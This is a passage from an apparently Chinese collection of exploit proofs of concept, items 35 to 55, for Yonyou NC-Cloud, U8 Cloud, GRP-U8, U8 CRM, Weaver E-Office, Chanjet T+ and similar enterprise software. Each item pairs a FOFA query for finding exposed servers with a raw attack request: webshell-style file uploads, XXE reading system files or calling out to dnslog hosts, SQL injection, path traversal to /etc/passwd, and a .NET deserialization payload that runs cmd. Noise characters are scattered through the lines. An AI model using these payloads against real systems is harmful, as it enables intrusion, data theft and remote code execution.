User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* h; W8 T; T: d! J
Content-Type: application/x-www-form-urlencoded
: o$ J8 f" F/ W' c  x6 EAccept-Encoding: gzip, deflate' C$ z# x6 c6 A; [
Accept: */*$ F7 e8 j+ E, z; l$ h
Connection: keep-alive$ ?& n0 Z4 O# r3 |  Z! s0 r: h

! I% e# ^3 _4 x! c7 Y9 X% N( J* z. J
35. 用友NC-Cloud importhttpscer任意文件上传8 G3 k# b5 {# `) a
FOFA:app="用友-NC-Cloud"
( |5 [$ B+ ?9 C2 {POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
9 n) W  Q" f- q9 dHost: 203.25.218.166:8888
# x  H/ C. v* J: z4 l% ^User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
2 X! @  c; d& d& X, j; J! ^- tAccept-Encoding: gzip, deflate0 H2 Z: Q# F6 O0 K, P  |2 M$ S
Accept: */*
- r2 g1 ?  F8 w. YConnection: close
7 X! Y, v5 F$ e6 iaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA4 U) D  t# q3 A
Content-Length: 190
: B5 [6 x- @5 j8 ~2 t% Y4 gContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0  W: B7 l' s: d* k/ h# N% n; G% P

  G" q- z/ M5 X5 b( S--fd28cb44e829ed1c197ec3bc71748df07 P$ K) n( k/ s* Y6 M
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
# b% L% E3 U! U* _# t8 r
* ~, l) J- T8 S, _3 d2 W<%out.println(1111*1111);%>" T9 X( s3 V* y3 k9 N
--fd28cb44e829ed1c197ec3bc71748df0--" i' Z+ x& z. f/ Y& H# \: h. i
; \4 U7 J0 V' X
: |/ J+ S; A3 F
36. 用友NC-Cloud soapFormat XXE2 K" }6 _+ m# f( g! Z
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
# z  N4 a/ w) R! _) N# ]POST /uapws/soapFormat.ajax HTTP/1.11 i" ^0 q- Q4 G- v* U  K
Host: 192.168.40.130:89894 o' ~- c/ `( {: H9 W: Z3 C! U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
) d. N7 q% _. A8 ~; p# D$ K9 s3 jContent-Length: 263
; u; l4 i% ~: N  `" E9 O9 M% PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& O: ~# I" v# l1 x4 G, g
Accept-Encoding: gzip, deflate) Q: X' }2 r) R; l' u! g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ l$ @) t$ X4 i. D; \* f
Connection: close
5 r3 C  F) x3 ]& cContent-Type: application/x-www-form-urlencoded% `7 R# K" a' y" M. Q% D7 I5 B) Q
Upgrade-Insecure-Requests: 1+ q) L- c. D* ~4 B0 E. z1 K' A
1 ]* I4 @, ~6 d. ^$ q$ \  z
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a% }/ l4 Q6 d, W) ]* h

, h2 F$ G) i# F4 }; _$ f! M
: d8 F* F; l3 r37. 用友NC-Cloud IUpdateService XXE2 `; H8 W, F- }. L% l
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"+ P9 F9 K5 l! w6 ^1 y7 s. R
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.10 F5 T: C# I7 i% v  k
Host: 192.168.40.130:8989- v3 q; P2 ?9 k5 G1 z$ _) d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36  ~2 S/ U2 i2 k( j
Content-Length: 421
* ~: G9 x  `; Z9 G7 u0 aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
9 B0 n2 e: R6 \8 }/ f$ n1 IAccept-Encoding: gzip, deflate  w: p- b: D' N3 K/ G% l( L9 C
Accept-Language: zh-CN,zh;q=0.94 L! A; W) D0 g2 S3 o0 [. s- {
Connection: close
9 R* N4 {) n% h4 w/ ^Content-Type: text/xml;charset=UTF-8
* W, S" ^  d; D" j7 R( n% E3 sSOAPAction: urn:getResult
, Z5 L1 J, R# i: Y, m& [Upgrade-Insecure-Requests: 1! H. n/ f* z. z4 v  i' n6 j
3 `: Z  ?' x5 R8 \6 n9 Z6 e3 a
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
! c2 S6 ^( U* O4 D* W0 Q<soapenv:Header/>
' f* U/ [  ~: f; J0 f<soapenv:Body>
  @, K3 h* R/ r7 W<iup:getResult>4 T; @; c- D& A! `  A. F
<!--type: string-->
1 K/ g% c! x- o$ S: x* x7 c<iup:string><![CDATA[
8 q( h/ ^5 N3 L2 l, b" ^% R3 N<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
6 n5 o: r- O. N7 }; x<xxx/>]]></iup:string>
% X& |/ u- A/ R" [& u) F</iup:getResult>) k& a1 }3 w; v0 X" V+ I$ x
</soapenv:Body>
2 l  q: G  `+ n; }; `/ ]</soapenv:Envelope>
' {& w" x. X& h& ]
" q8 |+ U, L7 F# x
4 |" f0 Y9 f5 V: d* E& `/ E7 s3 z' B& n3 l) B; O
38. 用友U8 Cloud smartweb2.RPC.d XXE
' B" h6 `# j. H8 ]FOFA:app="用友-U8-Cloud"
# r4 j- r% g3 }3 u+ |! ]POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
" r$ Q6 S, ?0 a( K$ O* A+ R- U0 [Host: 192.168.40.131:8088
- N  f1 x5 {4 m; ^+ X3 ]1 ]* @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25- D6 E: G1 z, _, E8 |2 A9 B" p
Content-Length: 260
1 E1 _9 t9 j, {& r+ ^8 `5 x+ [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
$ ]+ D  _9 w; L" |& ]Accept-Encoding: gzip, deflate
  ?9 Z8 r" @+ b0 CAccept-Language: zh-CN,zh;q=0.9
! R* }0 v9 a1 s7 K: \* tConnection: close; v' v& C- R% P7 h
Content-Type: application/x-www-form-urlencoded
  z8 T5 p; G* q& C- Q0 j2 M
4 C- o' }! ?* O' N& m: C0 {$ p__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>; x; N7 B4 _8 Z9 `
# a6 q( K( V2 O: M" F
( ~% k7 D6 f8 U5 R2 Q% a5 V
39. 用友U8 Cloud RegisterServlet SQL注入& v1 H$ e1 `6 l4 y! t
FOFA:title="u8c"
5 w( Q" x) u- ?( o0 P- }" |POST /servlet/RegisterServlet HTTP/1.1
- f) }. [. n- B( w- yHost: 192.168.86.128:80899 f0 n* d  M. R7 |: _- @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36/ u- r$ E, b. Z* \
Connection: close
4 u+ e- K7 k6 o! J$ }Content-Length: 85+ V6 `5 e. T6 R- j) D8 s) O* O$ R' y
Accept: */*6 o) Q$ _/ G, W1 M" [
Accept-Language: en. g2 I$ L5 h" m5 l7 R9 i
Content-Type: application/x-www-form-urlencoded) ?- b1 e4 `' V7 ^2 R7 m
X-Forwarded-For: 127.0.0.1
( g$ F' G" H3 J" Y& f: ]4 hAccept-Encoding: gzip/ W5 Z/ r4 f* M$ f# |0 q
7 p+ B1 n! G0 K  ]6 ^- ?
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--% D4 r6 @4 c4 N! K$ @" E0 ]( x' I

4 m6 E+ j6 V! C% ?6 e& D+ g
3 Q3 M$ j$ X% X* v40. 用友U8-Cloud XChangeServlet XXE
+ n) U; K; f0 G1 T$ B- m. |FOFA:app="用友-U8-Cloud"
8 I4 x0 b+ }# mPOST /service/XChangeServlet HTTP/1.14 y% ]5 L% f8 U5 m
Host: x.x.x.x# ?( D! h( L  T0 }- a; ^% D; h- J2 A
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36& P0 D# `/ O9 J' B) D/ T- V
Content-Type: text/xml
7 M4 t9 w6 I# ~) Z3 z) X) {Connection: close
% p# L1 K& a/ n/ [- M, _. g" ^( d# C: q- d
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
+ \1 l$ K+ D: ]9 `
+ w, z2 P; E; j) J- }, C- `6 x) |2 ]9 n1 i  h9 Q4 q. W9 y' j  Z
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入# N$ s3 b$ |5 o6 Q$ v/ u
FOFA:app="用友-U8-Cloud"
+ e# a6 g- V" w* q; R3 Q9 g1 |# TGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1( S- X& q  G. d
Host:8 O2 }! D, E0 }, `  \; l7 s0 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 G5 j5 Q- \+ M- }' O, T7 I* G( ^Content-Type: application/json
' U: Y- k8 b. x( ^Accept-Encoding: gzip' C# y" E: F& ?7 U0 W
Connection: close) r6 x9 A2 e6 k, P
3 l8 V4 N3 e  e
# a7 I# z6 [: a
42. 用友GRP-U8 SmartUpload01 文件上传# }4 u/ b; y5 P: _  J
FOFA:app="用友-GRP-U8"& S7 y6 V& J  e" |
POST /u8qx/SmartUpload01.jsp HTTP/1.1
8 N* z0 I0 G1 i  oHost: x.x.x.x! b0 b( p* |3 }' b4 x0 r- O0 G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
/ w6 i! U+ ~  m8 t* bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36$ D* j6 M! Z( r
* v' [% d$ V' ^
PAYLOAD! B3 ^) g4 l# C4 v" h/ S
; {& a: R9 E/ N- |- f7 \) o

, ]  l4 B0 l- L; B1 k/ I% [" Lhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
2 \9 |0 e4 U) b- L& O: U1 `8 T" O5 U& a* P$ [2 B5 B
43. 用友GRP-U8 userInfoWeb SQL注入致RCE" V1 f3 [2 [& n: K/ A6 f
FOFA:app="用友-GRP-U8"
3 ]$ `& u1 @8 l! B% ^, ~POST /services/userInfoWeb HTTP/1.1
3 c& G$ g" s7 G- x$ t5 n, {Host: your-ip5 [# ?) s& b+ r0 K4 f( c5 j2 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
$ _  Q! q1 x# X7 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) {2 U$ g/ i3 e* y. pAccept-Encoding: gzip, deflate4 c( d1 N3 B/ ^
Accept-Language: zh-CN,zh;q=0.9
" B9 G. _, h$ u5 N, lConnection: close7 C4 X& a% k4 Z* N/ c
SOAPAction:/ b+ U. ^% t7 p2 X9 L. f4 M6 `6 j
Content-Type: text/xml;charset=UTF-8
  [  b& z, h( U& O) r3 g! A' o8 F& K, X2 W; B$ [& Q
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">4 K3 O3 @1 Z# M, m6 m5 I
   <soapenv:Header/>
6 [. r& r. A4 N: `( e   <soapenv:Body>
+ b4 h8 W" s/ g4 X( l3 S      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">6 g/ [) P7 L5 J" {* j( V) D
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
/ K' q9 C$ K; l5 ]* v      </ser:getUserNameById>; X! G3 I1 g# ^* p4 @
   </soapenv:Body>( \  P: A* l6 |4 H4 n$ X
</soapenv:Envelope>
" w: B: O  _4 d) K, b! j% H7 e; z; a

" S/ c: |9 N3 A5 q. f2 s# r8 K4 O$ v44. 用友GRP-U8 bx_dj_check.jsp SQL注入
9 p( G1 a, ^  K0 CFOFA:app="用友-GRP-U8"
7 ]5 R$ ?4 Z; B' _2 D6 `6 d6 hGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
8 W+ O$ ^' }, V8 S5 ]  B: iHost: your-ip- A+ |7 _/ J4 |$ J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36% `# }, n. \' K# n$ V* y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, Y/ w4 }* h4 i$ g: d
Accept-Encoding: gzip, deflate) D! ~% p. A( r4 N2 |; S
Accept-Language: zh-CN,zh;q=0.9
/ ?- r5 X# f6 |; r# m: O) M5 m. dConnection: close8 c/ w" I- w2 c6 Y/ l
  A3 o& |$ p% n! ^
6 O5 M0 a4 s: r9 B4 M
45. 用友GRP-U8 ufgovbank XXE; b: j) V4 R( f% o
FOFA:app="用友-GRP-U8"
2 }9 s: [+ Z. A) W; Y) lPOST /ufgovbank HTTP/1.1! _5 {2 f# b! A2 a: F1 M6 _. f
Host: 192.168.40.130:222
4 J0 x, I& _. u, JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0& x) {' e( ^' G" c( {/ H& E5 g; n6 \
Connection: close' p! Y0 T1 v6 r# ]* {
Content-Length: 1615 v/ z! q  k4 Y2 F. ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! M. j- O+ w% u' J) x$ R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& y& d+ q; T5 }) J$ _  h, \# k& n
Content-Type: application/x-www-form-urlencoded6 o1 w, B! @2 ]9 {1 v
Accept-Encoding: gzip
7 h% t/ ?9 L9 L! `5 Y) k+ ?$ v: @5 S
reqData=<?xml version="1.0"?>6 @: i7 M/ t' _
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest. m+ \7 Z5 _7 K' G
3 L0 P3 e6 D7 M- u) F1 ?
, E0 y6 R& b! U. ?: ^
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
9 e4 F& K4 M' l& @' V4 `/ i" HFOFA:app="用友-GRP-U8"* {5 `7 ~  X7 g* M6 U. A$ f
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
2 t2 r  \" b" b! g( L8 ]# `Host: your-ip; x$ i8 O. O. z7 r* d0 d# {$ [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
) f; w& B8 _! ]0 _* e) C/ v  yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ V" L. Y1 S/ x7 G, vAccept-Encoding: gzip, deflate# I! l2 }# @# E$ ^& \2 h
Accept-Language: zh-CN,zh;q=0.95 s; [: Q, Q, ~  B0 J
Connection: close
7 ]; {  x( B7 h+ M: `# H5 @
9 ~5 o5 h5 ?5 W: x& W; _" t' f1 O) ]. B. t; U
47. 用友GRP A++Cloud 政府财务云 任意文件读取
2 K+ N7 c) P% w, FFOFA:body="/pf/portal/login/css/fonts/style.css"1 J3 N" v6 s# W3 U( a' N
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
; G, O( d/ T5 }$ q9 d/ s4 WHost: x.x.x.x
' s" p1 ~, R' G- ?7 DCache-Control: max-age=0& C- R$ P8 x- Y3 `+ v0 J
Upgrade-Insecure-Requests: 1- C" {, P' P. M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ ^: ^/ j' d3 h; P* X* ~3 ^& f* l$ b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 x5 i8 T0 @: A2 v2 r% MAccept-Encoding: gzip, deflate, br7 ~0 Z3 C$ p. z* a' G- B) k
Accept-Language: zh-CN,zh;q=0.9
- M8 Y& O# r. [+ ^9 `4 ]If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT, F5 H; o9 o* `* Z
Connection: close
# p3 P1 T- h& V' ^: G6 y
) d' U1 C( R1 J' u7 v" X9 e" J1 N; u, k# [7 c- L

1 K5 [" \& c6 p/ {/ G$ \48. 用友U8 CRM swfupload 任意文件上传
* G% x3 N: K0 L5 `FOFA:title="用友U8CRM"6 c" L" _6 l2 H  l, l) f' _: |
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1: E# ]- j6 M  J& o, N5 x
Host: your-ip
7 [5 E8 j( v7 j  _7 o+ {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.00 e3 @2 m* [8 e1 @+ H: V6 Y. o! E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 `( _) N3 h* ~. \/ Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ P, y) v: X* q, e5 K. ZAccept-Encoding: gzip, deflate
7 A, f# I4 G; OContent-Type: multipart/form-data;boundary=----2695209672394068716424300668557 m) [) U% Q0 T+ D0 S6 A/ [
------269520967239406871642430066855
! d3 P; [! a0 g  Z1 v5 j& XContent-Disposition: form-data; name="file"; filename="s.php"
, l# z  s8 l" e1231# s0 B) N$ i3 q1 s# c3 T1 r
Content-Type: application/octet-stream& T/ Q/ u9 v! @) F& m8 C$ [
------2695209672394068716424300668559 M( B" h) O+ `5 e
Content-Disposition: form-data; name="upload"
9 k/ g, A' x  Cupload
5 H, b+ m) U; `& V------269520967239406871642430066855--; D2 A0 q. c8 l9 L
2 a* Z' y4 n! J0 [9 G2 u

& G  F0 Z* U# y: H49. 用友U8 CRM系统uploadfile.php接口任意文件上传" T9 x/ M$ P7 N% m$ A
FOFA:body="用友U8CRM"
5 @  @  l* B1 C) n" y# k
7 N2 J2 c5 u- X+ t' f+ o# X& `) h2 TPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
$ M  t6 o/ s/ v% y% Q9 `  VHost: x.x.x.x. |% N+ y7 D. J+ w  R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ A) s- A1 B; _' l7 V9 k! D
Content-Length: 329
, U8 l/ `( q& j" {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' g; b( \; V) ?/ aAccept-Encoding: gzip, deflate! t, i( \. Q4 @! T- W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 t  l# w. M4 o, m
Connection: close& u( y8 T" k* J" I7 `4 X
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w( t; h5 v8 ~! p, j

6 W5 s5 z  `, W-----------------------------vvv3wdayqv3yppdxvn3w
% G( M# N7 d; P* aContent-Disposition: form-data; name="file"; filename="%s.php "
- E  G" ]. S. A/ AContent-Type: application/octet-stream( M& y  R& n& _  o
1 S! N5 k: a5 T) a; M
wersqqmlumloqa' z  Q) O( y8 Z( |/ E! s1 K
-----------------------------vvv3wdayqv3yppdxvn3w
# o3 Q0 _% n2 E& a5 Y" _Content-Disposition: form-data; name="upload"7 K6 w! f2 }8 A& i7 [7 l: g
* q; G# |! n$ K) z! p
upload2 J0 h" C% s( k) K* v# Y: i
-----------------------------vvv3wdayqv3yppdxvn3w--
, o% I! Y# |8 ~) q; K7 l( n& O
2 s  R* l: }: S" x5 J' @. o" w5 ]+ g" l# s( l4 w9 q' P
http://x.x.x.x/tmpfile/updB3CB.tmp.php- w: u, F7 C/ [
# r( i! L4 j) T  v/ _, w- W
50. QDocs Smart School 6.4.1 filterRecords SQL注入- N3 }6 y7 |0 R$ I( ]. H" u4 k. s
FOFA:body="close closebtnmodal"
! t3 R& S" h7 pPOST /course/filterRecords/ HTTP/1.1. j2 z9 }4 N9 |. P. k3 v6 ]
Host: x.x.x.x/ H5 K+ {# ^! z1 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.361 S7 x( l; n- a  O2 c! f
Connection: close
5 @4 @4 u: Z# w2 |Content-Length: 224
7 y4 O8 Y" a# j, W1 p. a9 YAccept: */*
4 O0 a* Z- q3 l& K( GAccept-Language: en
; X6 L; p2 x: z& g! }( F3 g0 P+ [Content-Type: application/x-www-form-urlencoded) l8 f& \( T4 L$ L, \, d
Accept-Encoding: gzip
" k& I* M' N( e: Z0 d: W& C1 `, h1 L+ w4 L9 P8 R5 f
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
) r/ P$ E8 c) }7 f/ {( d3 \, u+ ?; O1 J- m- A+ A

$ o6 `$ b) k3 ^/ s* S( |51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入! o  l2 q# O1 x
FOFA:app="云时空社会化商业ERP系统"
( z. n' t' o" C# ?' O, F/ Y0 \5 J8 mGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
: i- X: j4 d5 R( M* ?2 pHost: your-ip
/ f4 r- ?; d. O' k& m# rUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.365 c3 j$ X7 c: r% `8 _) z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.94 X, w, M. z% T4 \/ [
Accept-Encoding: gzip, deflate2 q& @5 h' \9 g+ Q
Accept-Language: zh-CN,zh;q=0.95 U4 M3 b5 L* E$ \
Connection: close4 m$ i7 Y% t: S8 E& |
) W1 }/ q8 d) j7 I3 q/ e

6 [* q2 k. J: k2 ]# v: C52. 泛微E-Office json_common.php sql注入
1 J3 K. [1 c$ T  N4 c8 YFOFA:app="泛微-EOffice"" B; W/ l+ r& x
POST /building/json_common.php HTTP/1.11 ~4 g+ |& I+ g
Host: 192.168.86.128:80977 ~# o+ D  g) x3 F5 Y7 C3 A
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 _  `1 ~, Z( m) f0 c3 e' p9 GConnection: close/ M7 q9 P1 ]" X" V# `
Content-Length: 877 @  a  K% {% D
Accept: */*
4 E# b& T! i( l! c) j4 Q. ^# jAccept-Language: en% a. }2 n' G) z' X
Content-Type: application/x-www-form-urlencoded+ }/ w. a# I+ [  W, [
Accept-Encoding: gzip+ ^& U' E5 Z) e
1 _! ?! D$ c( J
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
( E& |( N( Y- q* y) Y% ?8 a& X# f: H1 ^

" y4 n! G: k; t* G' b- U53. 迪普 DPTech VPN Service 任意文件上传
' `) h5 z) |% q8 gFOFA:app="DPtech-SSLVPN"* W; m; u( g: ^% P! L
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd' ]$ T3 R% R# a8 e. t- v5 q

0 T- M# B7 l5 a8 \* O8 _# M& Z- I% [$ k4 C- ]
54. 畅捷通T+ getstorewarehousebystore 远程代码执行% x. M4 A# K# q, m1 p% J4 n
FOFA:app="畅捷通-TPlus"* B8 ?8 m7 w% ~6 V
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件% z' U5 ~, P& k* J2 x9 }, \7 j
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
: l+ a4 W& O% h$ C4 X
' \. ]8 @5 H# ^0 c9 h/ i! a# n/ l
- i# \5 {0 E% q9 b. f- p% e% E! N完整数据包0 T& x; t, p. ^& L8 C" j: @' K
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.14 ?. [1 ?- ]9 N- A* X' \
Host: x.x.x.x- Q, E, g$ |. ^% y2 W/ J
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
5 x8 }- b) P4 z% @Content-Length: 5938 Z( v: \. N% `( j  c: H" y

  ^: u. S& M" F# {{) `) C  w1 i2 s6 s4 f6 f3 t. @
"storeID":{
! H# e  K6 [( q "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
6 S7 n8 ?7 R. g/ n; L. R "MethodName":"Start",
  Z9 U) D$ Q6 M0 ^' F  "ObjectInstance":{
+ _9 L% Q2 D9 H7 J5 ]   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
& Z4 g2 r& Q" [, P9 p& ]2 s, V: L    "StartInfo":{. d+ B4 I+ o  T- {& Y7 T
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
7 @% X3 b9 U) T+ q9 R    "FileName":"cmd",
3 b# {1 n' `/ u1 W' ^    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
  E% Q/ \' n+ h    }; N0 I( |7 d/ y7 |# ~
  }
' ~6 \4 V$ c7 n1 y8 S  }0 P6 m) n& R- T
}
7 y# D0 u* j9 M* r  F
3 _3 l/ ^+ S: b& r5 S
, b- |. T4 V0 }6 h第二步,访问如下url6 U/ u( m2 \5 n0 U
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
0 E3 ]6 l( Q% }- _' g" ^, k: }; [; @' w# A- R

/ f1 Z$ h" |2 d55. 畅捷通T+ getdecallusers信息泄露: g% h  X4 H/ J1 U* o" E
FOFA:app="畅捷通-TPlus"
8 s" [1 ]) o" k6 }" `& ~2 j第一步,通过& n, _+ H6 m$ _7 L# ]9 s# i5 n$ k
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
9 I9 K- N2 w. C$ P第二步,利用获取到的Cookie请求- W$ C9 {6 E. {8 }
